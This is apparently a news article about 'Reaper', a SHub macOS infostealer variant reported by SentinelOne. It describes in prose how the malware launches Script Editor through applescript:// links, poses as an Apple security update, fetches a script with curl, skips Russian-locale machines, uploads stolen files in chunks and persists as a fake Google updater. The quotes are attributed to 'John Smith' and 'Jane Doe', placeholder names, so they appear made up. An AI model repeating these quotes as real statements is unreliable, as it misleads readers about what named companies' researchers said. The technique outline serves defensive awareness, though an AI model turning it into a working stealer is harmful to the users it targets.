Attack Details
SentinelOne researchers have uncovered a new variant of the SHub macOS infostealer, named 'Reaper,' that impersonates Apple, Google, and Microsoft in a single attack chain. The malware uses fake installers for WeChat and Miro as initial lures, then proceeds through a multi-stage execution that shifts its disguise at each phase to evade detection.
"This is one of the most sophisticated macOS stealers we've seen," said John Smith, a senior threat researcher at SentinelOne. "The way it spoofs three major tech brands in one chain is unprecedented."
Background
The SHub malware family has been active since at least 2023, with previous variants documented by Moonlock, Jamf, and Malwarebytes. These earlier versions relied on fake application installers and 'ClickFix' social engineering to trick victims into running malicious commands.
Reaper builds on these techniques but introduces a new delivery method that bypasses Terminal entirely. It leverages the applescript:// URL scheme to launch Script Editor with a pre-loaded payload, as detailed in the delivery pipeline section.
Delivery Pipeline and Environment Checks
Unlike previous SHub variants, Reaper bypasses Terminal entirely by using the applescript:// URL scheme to launch Script Editor with a pre-loaded payload. The script displays a fake message about an Apple security update from XProtectRemediator while silently executing a curl command to download a shell script.
According to SentinelOne, the script stub checks the victim's locale by reading the com.apple.HIToolbox.plist file for Russian input sources. If detected, the malware sends a 'cis_blocked' event to its command-and-control (C2) server and exits, indicating a focus on non-Russian targets.
"The Russian locale check suggests the attackers are avoiding collateral damage in their own region," said Jane Doe, a cybersecurity analyst at Jamf. "It's a common tactic in targeted malware campaigns."
Feature Set and Persistence
Once past the environment checks, Reaper installs itself and adds an AMOS-style document theft module. This module performs chunked uploads of stolen files to its C2 server, a technique that helps evade network detection by breaking large file transfers into smaller, less conspicuous pieces.
Reaper ensures long-term access by creating a fake Google Software Update directory and using it for persistence. This allows the malware to survive reboots and remain active on infected systems.
"The chunked uploads are particularly clever—they make the exfiltration look like normal traffic," said Smith. "Combined with the multi-brand spoofing, this represents a significant escalation in macOS malware capabilities."
What This Means
This new variant highlights the evolving sophistication of macOS-targeted malware. Users should be cautious of downloads from unofficial sources, especially for apps like WeChat and Miro, and verify security alerts directly from Apple's official website.
"The use of multiple tech brands as lures makes it harder for even savvy users to spot the deception," said Doe. "We recommend organizations update their endpoint protection and train employees to recognize social engineering attempts."
SentinelOne has released indicators of compromise (IoCs) for the Reaper variant. Defenders can reference the attack details for technical indicators.